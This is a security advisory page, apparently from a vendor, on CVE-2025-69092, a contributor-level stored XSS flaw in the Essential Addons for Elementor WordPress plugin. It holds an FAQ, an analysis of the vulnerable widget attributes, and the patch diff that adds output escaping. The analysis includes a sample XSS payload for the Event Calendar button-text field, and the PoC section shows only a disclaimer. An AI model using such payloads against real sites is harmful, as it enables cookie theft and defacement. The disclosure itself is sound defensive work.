What is CVE-2025-69092?

CVE-2025-69092 is a stored cross-site scripting (XSS) vulnerability found in the Essential Addons for Elementor plugin for WordPress, affecting versions up to and including 6.5.3. It allows authenticated users with contributor-level access or higher to inject malicious scripts that execute when other users view compromised pages.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in multiple plugin components. Attackers can exploit it by injecting malicious JavaScript into specific widget settings, which is then stored and executed in the context of users viewing the affected pages.

Who is affected by this vulnerability?

WordPress sites using the Essential Addons for Elementor plugin version 6.5.3 or earlier are affected. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability, potentially impacting site administrators and regular users who view compromised content.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Essential Addons for Elementor plugin installed. If it is version 6.5.3 or earlier, your site is at risk. Additionally, review user roles and permissions to identify contributors and above who may have the ability to exploit this vulnerability.

What should I do to fix this vulnerability?

The vulnerability is patched in version 6.5.4 of the Essential Addons for Elementor plugin. It is recommended to update the plugin to the latest version immediately to mitigate the risk of exploitation.

What does the CVSS score of 6.4 indicate?

A CVSS score of 6.4 indicates a medium severity level for this vulnerability. This means that while it is not the most critical type of vulnerability, it can still pose a significant risk, especially if exploited by unauthorized users.

What are the practical risks associated with this vulnerability?

If exploited, this vulnerability can lead to stored XSS attacks, allowing attackers to execute scripts that could steal session cookies, deface websites, or redirect users to malicious sites. This can compromise user data and site integrity.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an authenticated attacker can inject a malicious payload into the Event Calendar widget’s settings. This payload is then stored and executed when users access the affected page, demonstrating the potential impact of the vulnerability.

What are the key vulnerable components identified?

Key vulnerable components include the Event_Calendar element’s data-detailsButtonText attribute, the Login_Register element’s Cloudflare Turnstile data attributes, and the Image_Masking extension’s style block generation. These components failed to properly escape user-controlled data.

How can I further secure my WordPress site against such vulnerabilities?

To enhance security, regularly update all plugins and themes, use strong user role management, and implement security plugins that can monitor and block potential threats. Additionally, consider conducting regular security audits.

Is there a way to test for this vulnerability on my site?

Yes, security professionals can use testing tools or scripts to simulate an attack based on the proof of concept. However, ensure you have permission and follow ethical guidelines when testing on any live site.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Essential Addons for Elementor plugin until a patch can be applied. Additionally, review user roles to limit contributor access and monitor for any unusual activity.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-69092: Essential Addons for Elementor <= 6.5.3 – Authenticated (Contributor+) Stored Cross-Site Scripting (essential-addons-for-elementor-lite)

CVE ID CVE-2025-69092

Plugin essential-addons-for-elementor-lite

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 6.5.3

Patched Version 6.5.4

Disclosed January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69092:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Essential Addons for Elementor WordPress plugin. The vulnerability affects versions up to and including 6.5.3, allowing attackers with contributor-level access or higher to inject malicious scripts that execute when users view compromised pages. The CVSS score of 6.4 reflects the moderate severity of this stored XSS condition.

The root cause lies in insufficient output escaping within multiple plugin components. Atomic Edge research identified several vulnerable code paths where user-controlled data was directly embedded into HTML attributes without proper escaping. Key vulnerable functions include the Event_Calendar element’s data-detailsButtonText attribute in includes/Elements/Event_Calendar.php line 3530, the Login_Register element’s Cloudflare Turnstile data attributes in includes/Elements/Login_Register.php line 7060, and the Image_Masking extension’s style block generation in includes/Extensions/Image_Masking.php lines 508, 525, 546, 565, and 584. These locations failed to apply proper escaping before outputting user-controlled settings values.

Exploitation requires an authenticated attacker with contributor privileges or higher. The attacker would create or edit a page using Elementor, add vulnerable Essential Addons widgets (Event Calendar, Login Register, or Image Masking), and inject malicious JavaScript payloads into the widget settings fields. For example, in the Event Calendar widget, the attacker could set the ‘Event Details Button Text’ field to a payload like ‘”>alert(document.domain)’. When the page is saved and later viewed by any user, the malicious script executes in the victim’s browser context.

The patch in version 6.5.4 addresses the vulnerability by adding proper escaping functions. In Event_Calendar.php line 3530, the fix wraps wp_kses() output with esc_attr(). In Login_Register.php line 7060, data-theme and data-sitekey attributes now use esc_attr() for both variables. In Image_Masking.php, multiple lines receive esc_attr() or esc_html() wrappers for element IDs and style content. These changes ensure user-controlled data is properly encoded before being output to HTML, neutralizing XSS payloads while maintaining widget functionality.

Successful exploitation leads to stored XSS attacks where malicious scripts persist in the WordPress database and execute whenever users access compromised pages. Attackers can steal session cookies, perform actions as authenticated users, deface websites, or redirect visitors to malicious sites. The contributor-level requirement limits the attack surface, but many WordPress sites grant contributor access to multiple users, making this a significant threat to site security and user data.

Differential between vulnerable and patched code

Code Diff

--- a/essential-addons-for-elementor-lite/essential_adons_elementor.php
+++ b/essential-addons-for-elementor-lite/essential_adons_elementor.php
@@ -4,7 +4,7 @@
  * Description: The Essential plugin you install after Elementor! Packed with 100+ stunning elements like Data Table, Event Calendar, Filterable Gallery, WooCommerce.
  * Plugin URI: https://essential-addons.com/
  * Author: WPDeveloper
- * Version: 6.5.3
+ * Version: 6.5.4
  * Author URI: https://wpdeveloper.com/
  * Text Domain: essential-addons-for-elementor-lite
  * Domain Path: /languages
@@ -27,7 +27,7 @@
 define('EAEL_PLUGIN_BASENAME', plugin_basename(__FILE__));
 define('EAEL_PLUGIN_PATH', trailingslashit(plugin_dir_path(__FILE__)));
 define('EAEL_PLUGIN_URL', trailingslashit(plugins_url('/', __FILE__)));
-define('EAEL_PLUGIN_VERSION', '6.5.3');
+define('EAEL_PLUGIN_VERSION', '6.5.4');
 define('EAEL_ASSET_PATH', wp_upload_dir()['basedir'] . '/essential-addons-elementor');
 define('EAEL_ASSET_URL', wp_upload_dir()['baseurl'] . '/essential-addons-elementor');
 /**
--- a/essential-addons-for-elementor-lite/includes/Classes/Compatibility_Support.php
+++ b/essential-addons-for-elementor-lite/includes/Classes/Compatibility_Support.php
@@ -64,11 +64,11 @@
 	public function eael_mondialrelay_shipping_form_after() {
 		?>
 		<tr class="mrwp" style="display:none">
-			<th><?php echo __('Livraison Mondial Relay','essential-addons-for-elementor-lite');?>
+			<th><?php echo esc_html__('Livraison Mondial Relay','essential-addons-for-elementor-lite');?>
 			<br>
-			<em id="parcel_shop_info" class="parcel_shop_info"><?php echo __("Vous n'avez pas encore choisi de Point Relais®",'essential-addons-for-elementor-lite');?></em>
+			<em id="parcel_shop_info" class="parcel_shop_info"><?php echo esc_html__("Vous n'avez pas encore choisi de Point Relais®",'essential-addons-for-elementor-lite');?></em>
 			</th>
-			<td><a id="modaal_link" class="modaal_link" href="#modaal"><?php echo  __('Choisir un Point Relais®', 'essential-addons-for-elementor-lite'); ?></a></td>
+			<td><a id="modaal_link" class="modaal_link" href="#modaal"><?php echo  esc_html__('Choisir un Point Relais®', 'essential-addons-for-elementor-lite'); ?></a></td>
 		</tr>
 		<script>
 			jQuery(".modaal_link").modaal({
--- a/essential-addons-for-elementor-lite/includes/Classes/WPDeveloper_Setup_Wizard.php
+++ b/essential-addons-for-elementor-lite/includes/Classes/WPDeveloper_Setup_Wizard.php
@@ -272,7 +272,7 @@
 				'local_plugin_data' => $this->get_local_plugin_data( 'templately/templately.php' ),
 				'promo_img_url'     => EAEL_PLUGIN_URL . 'assets/admin/images/quick-setup/templately-qs-img.png',
 				'titles'            => [
-					__("5000+", "essential-addons-for-elementor-lite"),
+					__("6500+", "essential-addons-for-elementor-lite"),
 					__("Ready Templates", "essential-addons-for-elementor-lite")
 				],
 				'features' => [
--- a/essential-addons-for-elementor-lite/includes/Elements/Event_Calendar.php
+++ b/essential-addons-for-elementor-lite/includes/Elements/Event_Calendar.php
@@ -3527,7 +3527,7 @@
             data-monthColumnHeaderFormat = "' . esc_attr( $settings['eael_calendar_column_heading_month'] ) . '"
             data-weekColumnHeaderFormat = "' . esc_attr( $settings['eael_calendar_column_heading_week'] ) . '"
             data-hideDetailsLink= "' . esc_attr( $settings['eael_event_details_link_hide'] ) . '"
-            data-detailsButtonText = "' . wp_kses( $settings['eael_event_details_text'], Helper::eael_allowed_tags() ) . '"
+            data-detailsButtonText = "' . esc_attr( wp_kses( $settings['eael_event_details_text'], Helper::eael_allowed_tags() ) ) . '"
             data-location-display = "' . esc_attr( $settings['eael_event_location_display'] ) . '"
             data-events="' . esc_attr( htmlspecialchars( json_encode( $data ), ENT_QUOTES, 'UTF-8' ) ) . '"
             data-thumbnail_position = "' . ( !empty( $settings['eael_event_show_thumbnail'] ) ? esc_attr( $settings['eael_event_thumbnail_position'] ) : '') . '"
--- a/essential-addons-for-elementor-lite/includes/Elements/Login_Register.php
+++ b/essential-addons-for-elementor-lite/includes/Elements/Login_Register.php
@@ -7057,7 +7057,7 @@
 		if ( ! empty( $this->cloudflare_turnstile_sitekey ) && 'yes' === $this->get_settings_for_display( "enable_cloudflare_turnstile" ) && ( 'yes' === $this->get_settings_for_display( "enable_cloudflare_turnstile_on_{$form_type}" ) ) ) {
 			$id = "eael-{$form_type}-cloudflare-turnstile-" . esc_attr( $this->get_id() );
 			wp_enqueue_script( 'eael-cloudflare' );
-			echo "<div class='cf-turnstile' data-theme='{$this->ds['cloudflare_turnstile_theme']}' data-sitekey='{$this->cloudflare_turnstile_sitekey}'></div>";
+			echo "<div class='cf-turnstile' data-theme='" . esc_attr( $this->ds['cloudflare_turnstile_theme'] ) . "' data-sitekey='" . esc_attr( $this->cloudflare_turnstile_sitekey ) . "'></div>";
 		}
 	}

--- a/essential-addons-for-elementor-lite/includes/Elements/Product_Grid.php
+++ b/essential-addons-for-elementor-lite/includes/Elements/Product_Grid.php
@@ -3730,20 +3730,21 @@
 		                $args['total_post'] = $found_posts;

 		                // Add secondary image data attributes
-		                $secondary_image_data = '';
-		                if ( isset( $settings['eael_product_grid_show_secondary_image'] ) ) {
-		                    $secondary_image_data .= sprintf( ' data-ssi-desktop="%s"', esc_attr( $settings['eael_product_grid_show_secondary_image'] ) );
-		                    $secondary_image_data .= sprintf( ' data-ssi-tablet="%s"', esc_attr( $settings['eael_product_grid_show_secondary_image_tablet'] ?? $settings['eael_product_grid_show_secondary_image'] ) );
-		                    $secondary_image_data .= sprintf( ' data-ssi-mobile="%s"', esc_attr( $settings['eael_product_grid_show_secondary_image_mobile'] ?? $settings['eael_product_grid_show_secondary_image'] ) );
-		                }
+                        $this->add_render_attribute( 'eael-post-appender', 'class', [ 'products', 'eael-post-appender', 'eael-post-appender-' . $this->get_id() ] );
+                        if ( isset( $settings['eael_product_grid_show_secondary_image'] ) ) {
+                            $this->add_render_attribute( 'eael-post-appender', 'data-ssi-desktop' , esc_attr( $settings['eael_product_grid_show_secondary_image'] ) );
+                            $this->add_render_attribute( 'eael-post-appender', 'data-ssi-tablet' , esc_attr( $settings['eael_product_grid_show_secondary_image_tablet'] ?? $settings['eael_product_grid_show_secondary_image'] ) );
+                            $this->add_render_attribute( 'eael-post-appender', 'data-ssi-mobile' , esc_attr( $settings['eael_product_grid_show_secondary_image_mobile'] ?? $settings['eael_product_grid_show_secondary_image'] ) );
+                        }

-		                printf( '<ul class="products eael-post-appender" data-layout-mode="%s"%s>', esc_attr( $settings["eael_product_grid_layout"] ), $secondary_image_data );
+                        $this->add_render_attribute( 'eael-post-appender', 'data-layout-mode' , esc_attr( $settings['eael_product_grid_layout'] ) );
+                        echo '<ul '; $this->print_render_attribute_string( 'eael-post-appender' ); echo '>';

-                            while ( $query->have_posts() ) {
-                                $query->the_post();
-                                include( realpath( $template ) );
-                            }
-                            wp_reset_postdata();
+                        while ( $query->have_posts() ) {
+                            $query->the_post();
+                            include( realpath( $template ) );
+                        }
+                        wp_reset_postdata();

 		                echo '</ul>';
                         do_action( 'eael_woo_after_product_loop' );
--- a/essential-addons-for-elementor-lite/includes/Extensions/Image_Masking.php
+++ b/essential-addons-for-elementor-lite/includes/Extensions/Image_Masking.php
@@ -497,7 +497,7 @@
 			$type = $settings['eael_image_masking_type'];
             $element_id = $element->get_id();
             $style = '';
-            $element->add_render_attribute( '_wrapper', 'class', 'eael-image-masking-' . $element_id );
+            $element->add_render_attribute( '_wrapper', 'class', 'eael-image-masking-' . esc_attr( $element_id ) );
 			if( 'clip' === $type ){
                 $clip_path_value = '';
                 if( 'yes' === $settings['eael_image_masking_enable_custom_clip_path'] ){
@@ -508,7 +508,7 @@
                     $clip_path_value = $this->clip_paths( $clip_path );
                 }
                 if( $clip_path_value ) {
-                    $style .= '.eael-image-masking-'.$element_id.' img {clip-path: '.$clip_path_value.'}';
+                    $style .= '.eael-image-masking-'. esc_html( $element_id ) .' img {clip-path: '.$clip_path_value.'}';
                 }

                 if( 'yes' === $settings['eael_image_masking_hover_effect'] ){
@@ -525,14 +525,14 @@
                         if( $hover_selector ){
                             $hover_selector = ' ' . trim( $hover_selector );
                         }
-                        $style .= '.eael-image-masking-'.$element_id.$hover_selector.':hover img {clip-path: '.$hover_clip_path_value.'}';
+                        $style .= '.eael-image-masking-'. esc_html( $element_id ) . $hover_selector . ':hover img {clip-path: '.$hover_clip_path_value.'}';
                     }

                     $hover_selector = $settings['eael_image_masking_hover_selector'];
                     if( $hover_selector ){
                         $hover_selector = ' ' . trim( $hover_selector );
                     }
-                    $style .= '.eael-image-masking-'.$element_id.$hover_selector.':hover img {clip-path: '.$hover_clip_path_value.'}';
+                    $style .= '.eael-image-masking-'. esc_html( $element_id ) . $hover_selector . ':hover img {clip-path: '.$hover_clip_path_value.'}';
                 }
 			} else if( 'image' === $type ) {
                 $svg = $element->get_settings_for_display( 'eael_image_masking_svg' );
@@ -546,7 +546,7 @@
                 }

                 if( $mask_url ) {
-                    $style .= '.eael-image-masking-'.$element_id.' img {mask-image: url('.$mask_url.'); -webkit-mask-image: url('.$mask_url.');}';
+                    $style .= '.eael-image-masking-'. esc_html( $element_id ) .' img {mask-image: url('.$mask_url.'); -webkit-mask-image: url('.$mask_url.');}';
                 }

                 if( 'yes' === $settings['eael_image_masking_hover_effect'] ){
@@ -565,7 +565,7 @@
                         if( $hover_selector ){
                             $hover_selector = ' ' . trim( $hover_selector );
                         }
-                        $style .= '.eael-image-masking-'.$element_id. $hover_selector .':hover img {mask-image: url('.$hover_mask_url.'); -webkit-mask-image: url('.$hover_mask_url.');}';
+                        $style .= '.eael-image-masking-'. esc_html( $element_id ) . $hover_selector .':hover img {mask-image: url('.$hover_mask_url.'); -webkit-mask-image: url('.$hover_mask_url.');}';
                     }
                 }

@@ -584,7 +584,7 @@


             if( $style ){
-                echo '<style id="eael-image-masking-'.$element_id.'">'.$style.'</style>';
+                echo '<style id="eael-image-masking-'. esc_attr( $element_id ) .'">'. esc_html( $style ) .'</style>';
             }
         }
 	}
--- a/essential-addons-for-elementor-lite/includes/Extensions/Post_Duplicator.php
+++ b/essential-addons-for-elementor-lite/includes/Extensions/Post_Duplicator.php
@@ -78,7 +78,7 @@
 		}

 		if ( ! current_user_can( 'edit_post', $post_id ) ) {
-			wp_die( __( 'You do not have sufficient permissions to edit this post.', 'essential-addons-for-elementor-lite' ) );
+			wp_die( esc_html__( 'You do not have permissions to edit this post.', 'essential-addons-for-elementor-lite' ) );
 		}

 		$post = sanitize_post( get_post( $post_id ), 'db' );
--- a/essential-addons-for-elementor-lite/includes/Traits/Admin.php
+++ b/essential-addons-for-elementor-lite/includes/Traits/Admin.php
@@ -48,6 +48,10 @@
             wp_enqueue_style( 'essential_addons_elementor-template-cloud-css', EAEL_PLUGIN_URL . 'assets/admin/css/cloud.css', false, EAEL_PLUGIN_VERSION );
         }

+        if ( isset( $hook ) && $hook == 'elementor_page_elementor-element-manager' ) {
+		    wp_enqueue_style( 'ea-icon-admin', EAEL_PLUGIN_URL . 'assets/admin/css/eaicon.css', array(), EAEL_PLUGIN_VERSION );
+        }
+
 	    if ( isset( $hook ) && $hook == 'toplevel_page_eael-settings' ) {
 		    wp_enqueue_style( 'eael-admin-icon-css', EAEL_PLUGIN_URL . 'includes/templates/admin/icons/style.css', array(), EAEL_PLUGIN_VERSION );
 		    wp_enqueue_style( 'eael-admin-css', EAEL_PLUGIN_URL . 'includes/templates/admin/eael-dashboard/dist/assets/ea-dashboard.css', array(), EAEL_PLUGIN_VERSION );
@@ -122,7 +126,7 @@
 				    ]
 			    ],
 			    'templately_promo'        => [
-				    'heading' => __( 'Unlock 5000+ Ready Templates', 'essential-addons-for-elementor-lite' ),
+				    'heading' => __( 'Unlock 6500+ Ready Templates', 'essential-addons-for-elementor-lite' ),
 				    'list'    => [
 					    __( 'Stunning Templates For All', 'essential-addons-for-elementor-lite' ),
 					    __( 'One-Click Full Site Import', 'essential-addons-for-elementor-lite' ),
@@ -1931,7 +1935,7 @@
                             postData += '&later=' + later;
                         }

-                        postData += '&nonce=<?php echo wp_create_nonce( 'wpnotice_dismiss_notice_bfcm_2025_notice' );?>';
+                        postData += '&nonce=<?php echo esc_attr( wp_create_nonce( 'wpnotice_dismiss_notice_bfcm_2025_notice' ) );?>';

                         httpRequest.open('POST', '<?php echo esc_url( admin_url( 'admin-ajax.php' ) ); ?>');
                         httpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
--- a/essential-addons-for-elementor-lite/includes/Traits/Ajax_Handler.php
+++ b/essential-addons-for-elementor-lite/includes/Traits/Ajax_Handler.php
@@ -183,27 +183,56 @@
 			$settings['show_load_more_text']       = $settings['eael_fg_loadmore_btn_text'];
 			$settings['layout_mode']               = isset( $settings['layout_mode'] ) ? $settings['layout_mode'] : 'masonry';

-			if ( ! empty( $args['fetch_acf_image'] ) && 'yes' === $args['fetch_acf_image'] && ! empty( $args['post__in'] ) ) {
-				$args['post_status'] = 'any';
-				$args['post_type'] = 'any';
-			}
-
 			$exclude_ids = json_decode( html_entity_decode( stripslashes ( $_POST['exclude_ids'] ) ) );
 			$args['post__not_in'] = ( !empty( $_POST['exclude_ids'] ) ) ? array_map( 'intval', array_unique($exclude_ids) ) : array();
 			$active_term_id = ( !empty( $_POST['active_term_id'] ) ) ? intval( $_POST['active_term_id'] ) : 0;
 			$active_taxonomy = ( !empty( $_POST['active_taxonomy'] ) ) ? sanitize_text_field( $_POST['active_taxonomy'] ) : '';

-			if ( ! empty( $args['post__not_in'] ) && ! empty( $args['post__in'] ) ) {
-				$args['post__in'] = array_diff( $args['post__in'], array_unique( $args['post__not_in'] ) );
-			}
+			// Check if this is a hybrid/combined query with ACF gallery
+			// Also check settings for hybrid query flag as backup (in case args encoding failed)
+			$is_hybrid_query = ( ! empty( $args['eael_dfg_enable_combined_query'] ) && 'yes' === $args['eael_dfg_enable_combined_query'] )
+				|| ( ! empty( $settings['eael_dfg_enable_combined_query'] ) && 'yes' === $settings['eael_dfg_enable_combined_query'] && 'yes' === $settings['fetch_acf_image_gallery'] );
+
+			if ( $is_hybrid_query && class_exists( 'ACF' ) && ! empty( $settings['eael_acf_gallery_keys'] ) ) {
+				// Build taxonomy map for ACF gallery attachments
+				$taxonomy_map = $this->build_dfg_acf_taxonomy_map( $args, $settings, $active_term_id, $active_taxonomy );
+
+				// Store globally for templates
+				global $eael_dfg_attachment_taxonomy_map;
+				$eael_dfg_attachment_taxonomy_map = $taxonomy_map['taxonomy_map'];
+
+				// Update args with the filtered post IDs
+				if ( ! empty( $taxonomy_map['post_ids'] ) ) {
+					$args['post__in'] = $taxonomy_map['post_ids'];
+					$args['post_type'] = 'any';
+					$args['post_status'] = 'any';
+					$args['tax_query'] = [];
+					$args['orderby'] = 'post__in';
+				}
+
+				// Apply exclusions
+				if ( ! empty( $args['post__not_in'] ) && ! empty( $args['post__in'] ) ) {
+					$args['post__in'] = array_values( array_diff( $args['post__in'], array_unique( $args['post__not_in'] ) ) );
+				}
+			} else {
+				// Standard ACF gallery handling (non-hybrid)
+				if ( ! empty( $args['fetch_acf_image'] ) && 'yes' === $args['fetch_acf_image'] && ! empty( $args['post__in'] ) ) {
+					$args['post_status'] = 'any';
+					$args['post_type'] = 'any';
+				}
+
+				if ( ! empty( $args['post__not_in'] ) && ! empty( $args['post__in'] ) ) {
+					$args['post__in'] = array_diff( $args['post__in'], array_unique( $args['post__not_in'] ) );
+				}

-			if( 0 < $active_term_id &&
-				!empty( $active_taxonomy ) &&
-				!empty($args['tax_query'])
-			) {
-				foreach ($args['tax_query'] as $key => $taxonomy) {
-					if (isset($taxonomy['taxonomy']) && $taxonomy['taxonomy'] === $active_taxonomy) {
-						$args['tax_query'][$key]['terms'] = [$active_term_id];
+				if( 0 < $active_term_id &&
+					!empty( $active_taxonomy ) &&
+					!empty($args['tax_query'])
+				) {
+					foreach ($args['tax_query'] as $key => $taxonomy) {
+						if (isset($taxonomy['taxonomy']) && $taxonomy['taxonomy'] === $active_taxonomy) {
+							$args['tax_query'][$key]['terms'] = [$active_term_id];
+						}
 					}
 				}
 			}
@@ -302,6 +331,192 @@
 	}

 	/**
+	 * Build taxonomy map for Dynamic Filterable Gallery ACF attachments
+	 * Maps attachment IDs to their parent post's taxonomy classes for filtering
+	 *
+	 * @param array $args Query args
+	 * @param array $settings Widget settings
+	 * @param int $active_term_id Active filter term ID
+	 * @param string $active_taxonomy Active filter taxonomy
+	 * @return array Array with 'post_ids' and 'taxonomy_map'
+	 */
+	protected function build_dfg_acf_taxonomy_map( $args, $settings, $active_term_id = 0, $active_taxonomy = '' ) {
+		$_args = $args;
+		$_args['posts_per_page'] = -1;
+		$_args['fields'] = 'ids';
+
+		// Restore original post_type from settings (args may have 'any' from hybrid query encoding)
+		if ( ! empty( $settings['post_type'] ) && $settings['post_type'] !== 'by_id' ) {
+			$_args['post_type'] = $settings['post_type'];
+			$_args['post_status'] = 'publish';
+		}
+
+		// Remove post__in constraint to get all matching parent posts
+		unset( $_args['post__in'] );
+
+		// If filtering by a specific term, apply the filter to parent posts
+		if ( $active_term_id > 0 && ! empty( $active_taxonomy ) ) {
+			$_args['tax_query'] = [
+				[
+					'taxonomy' => $active_taxonomy,
+					'field' => 'term_id',
+					'terms' => [ $active_term_id ],
+				]
+			];
+		}
+
+		$query = new WP_Query( $_args );
+
+		$post_ids = [];
+		$taxonomy_map = [];
+
+		if ( $query->have_posts() ) {
+			while ( $query->have_posts() ) {
+				$query->the_post();
+				$parent_post_id = get_the_ID();
+
+				// Get parent post's taxonomy classes
+				$parent_taxonomy_classes = $this->get_dfg_post_taxonomy_classes( $parent_post_id, $settings );
+
+				// Include parent posts unless hidden
+				if ( ! isset( $settings['eael_gf_hide_parent_items'] ) || 'yes' !== $settings['eael_gf_hide_parent_items'] ) {
+					$post_ids[] = $parent_post_id;
+				}
+
+				// Get ACF gallery items
+				$acf_gallery = [];
+				if ( ! empty( $settings['eael_acf_gallery_keys'] ) ) {
+					foreach ( $settings['eael_acf_gallery_keys'] as $key ) {
+						$_acf_gallery = get_field( $key, $parent_post_id );
+						if ( ! empty( $_acf_gallery ) ) {
+							$acf_gallery = array_merge( $_acf_gallery, $acf_gallery );
+						}
+					}
+				}
+
+				if ( ! empty( $acf_gallery ) ) {
+					foreach ( $acf_gallery as $item ) {
+						$attachment_id = false;
+
+						if ( empty( $item['ID'] ) ) {
+							if ( 'integer' === gettype( $item ) ) {
+								$attachment_id = $item;
+							} else if ( 'string' === gettype( $item ) ) {
+								$attachment_id = HelperClass::eael_get_attachment_id_from_url( $item );
+							}
+
+							if ( ! $attachment_id ) {
+								continue;
+							}
+
+							$attachment = get_post( $attachment_id );
+							if ( ! is_object( $attachment ) || ! isset( $attachment->ID ) ) {
+								continue;
+							}
+						} else {
+							$attachment_id = $item['ID'];
+						}
+
+						$post_ids[] = $attachment_id;
+
+						// Map this attachment to its parent's taxonomy classes
+						if ( ! isset( $taxonomy_map[ $attachment_id ] ) ) {
+							$taxonomy_map[ $attachment_id ] = $parent_taxonomy_classes;
+						} else {
+							$taxonomy_map[ $attachment_id ] = array_unique(
+								array_merge( $taxonomy_map[ $attachment_id ], $parent_taxonomy_classes )
+							);
+						}
+					}
+				}
+			}
+		}
+		wp_reset_postdata();
+
+		return [
+			'post_ids' => array_unique( $post_ids ),
+			'taxonomy_map' => $taxonomy_map
+		];
+	}
+
+	/**
+	 * Get taxonomy classes for a post (for DFG ACF gallery parent posts)
+	 *
+	 * @param int $post_id Post ID
+	 * @param array $settings Widget settings
+	 * @return array Array of taxonomy slug classes
+	 */
+	protected function get_dfg_post_taxonomy_classes( $post_id, $settings ) {
+		$classes = [];
+		$post_type = get_post_type( $post_id );
+
+		// Get all taxonomies for this post type
+		$get_object_taxonomies = get_object_taxonomies( $post_type );
+		$taxonomies = wp_get_object_terms( $post_id, $get_object_taxonomies, array( "fields" => "slugs" ) );
+
+		if ( $taxonomies && ! is_wp_error( $taxonomies ) ) {
+			foreach ( $taxonomies as $taxonomy ) {
+				$classes[] = $taxonomy;
+			}
+		}
+
+		// Handle category child items
+		$show_category_child_items = ! empty( $settings['category_show_child_items'] ) && 'yes' === $settings['category_show_child_items'] ? 1 : 0;
+		$show_product_cat_child_items = ! empty( $settings['product_cat_show_child_items'] ) && 'yes' === $settings['product_cat_show_child_items'] ? 1 : 0;
+
+		$category_or_product_cat = '';
+		if ( 1 === $show_category_child_items && ! empty( $get_object_taxonomies ) && in_array( 'category', $get_object_taxonomies ) ) {
+			$category_or_product_cat = 'category';
+		}
+
+		if ( 1 === $show_product_cat_child_items && ! empty( $get_object_taxonomies ) && in_array( 'product_cat', $get_object_taxonomies ) ) {
+			$category_or_product_cat = 'product_cat';
+		}
+
+		if ( $category_or_product_cat ) {
+			$terms = get_the_terms( $post_id, $category_or_product_cat );
+			if ( $terms && ! is_wp_error( $terms ) ) {
+				foreach ( $terms as $term ) {
+					$parent_list = get_term_parents_list( $term->term_id, $category_or_product_cat, array( "format" => "slug", 'separator' => '/', "link" => 0, "inclusive" => 0 ) );
+					$parent_list = explode( '/', $parent_list );
+					$classes = array_merge( $classes, array_filter( $parent_list ) );
+				}
+			}
+		}
+
+		// Get categories
+		$categories = get_the_category( $post_id );
+		if ( $categories ) {
+			foreach ( $categories as $category ) {
+				$classes[] = $category->slug;
+			}
+		}
+
+		// Get tags
+		$tags = wp_get_post_tags( $post_id );
+		if ( $tags ) {
+			foreach ( $tags as $tag ) {
+				$classes[] = $tag->slug;
+			}
+		}
+
+		// Get product categories
+		$product_cats = get_the_terms( $post_id, 'product_cat' );
+		if ( $product_cats && ! is_wp_error( $product_cats ) ) {
+			foreach ( $product_cats as $cat ) {
+				if ( is_object( $cat ) ) {
+					$classes[] = $cat->slug;
+				}
+			}
+		}
+
+		// Add post name/slug
+		$classes[] = get_post_field( 'post_name', $post_id );
+
+		return array_unique( array_filter( $classes ) );
+	}
+
+	/**
 	 * Woo Pagination Product Ajax
 	 * get product list when pagination number/dot click by ajax
 	 *
--- a/essential-addons-for-elementor-lite/includes/Traits/Controls.php
+++ b/essential-addons-for-elementor-lite/includes/Traits/Controls.php
@@ -369,6 +369,22 @@
                         ]
                     ]
                 );
+
+                $wb->add_control(
+                    'eael_dfg_enable_combined_query',
+                    [
+                        'label' => __('Enable Combined Query', 'essential-addons-for-elementor-lite'),
+                        'type' => Controls_Manager::SWITCHER,
+                        'label_on' => __('Yes', 'essential-addons-for-elementor-lite'),
+                        'label_off' => __('No', 'essential-addons-for-elementor-lite'),
+                        'return_value' => 'yes',
+                        'default' => '',
+                        'description' => __('Combine filtered items with ACF gallery items.', 'essential-addons-for-elementor-lite'),
+                        'condition' => [
+                            'fetch_acf_image_gallery' => 'yes',
+                        ],
+                    ]
+                );
             } else {
                 $wb->add_control(
                     'eael_scf_gallery_warnig_text',
--- a/essential-addons-for-elementor-lite/includes/Traits/Core.php
+++ b/essential-addons-for-elementor-lite/includes/Traits/Core.php
@@ -45,7 +45,7 @@

         // go pro
         if (!$this->pro_enabled) {
-            $links[] = sprintf('<a href="https://essential-addons.com/bfcm-2025-plugins-wp" target="_blank" style="color: #000; font-weight: bold;">' . __('Save 40%% Today', 'essential-addons-for-elementor-lite') . '</a>');
+	        $links[] = sprintf('<a href="https://wpdeveloper.com/in/upgrade-essential-addons-elementor" target="_blank" style="color: #524cff; font-weight: bold;">' . __('Go Pro', 'essential-addons-for-elementor-lite') . '</a>');
         }

         return $links;
--- a/essential-addons-for-elementor-lite/includes/Traits/Enqueue.php
+++ b/essential-addons-for-elementor-lite/includes/Traits/Enqueue.php
@@ -110,7 +110,7 @@
         $src = EAEL_PLUGIN_URL . 'assets/admin/images/templately/logo-icon.svg';
         $css = "
 		.elementor-add-new-section .elementor-add-templately-promo-button{
-            background-color: #5d4fff;
+            background-color: #5d4fff !important;
             background-image: url({$src});
             background-repeat: no-repeat;
             background-position: center center;
--- a/essential-addons-for-elementor-lite/includes/Traits/Helper.php
+++ b/essential-addons-for-elementor-lite/includes/Traits/Helper.php
@@ -382,10 +382,11 @@
                             <img src="<?php echo esc_url( EAEL_PLUGIN_URL . 'assets/admin/images/templately/logo.svg' ); ?>" alt="">
                         </div>
                         <ul class="eael-promo-temp__feature__list">
-                            <li><?php esc_html_e('5,000+ Stunning Templates','essential-addons-for-elementor-lite'); ?></li>
+                            <li><?php esc_html_e('6500+ Ready Templates','essential-addons-for-elementor-lite'); ?></li>
                             <li><?php esc_html_e('Supports Elementor & Gutenberg','essential-addons-for-elementor-lite'); ?></li>
-                            <li><?php esc_html_e('Powering up 300,000+ Websites','essential-addons-for-elementor-lite'); ?></li>
+                            <li><?php esc_html_e('Powering up 4,00,000+ Websites','essential-addons-for-elementor-lite'); ?></li>
                             <li><?php esc_html_e('Cloud Collaboration with Team','essential-addons-for-elementor-lite'); ?></li>
+                            <li><?php esc_html_e('1-Click Full Site Import','essential-addons-for-elementor-lite'); ?></li>
                         </ul>
                         <form class="eael-promo-temp__form">
                             <label>

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

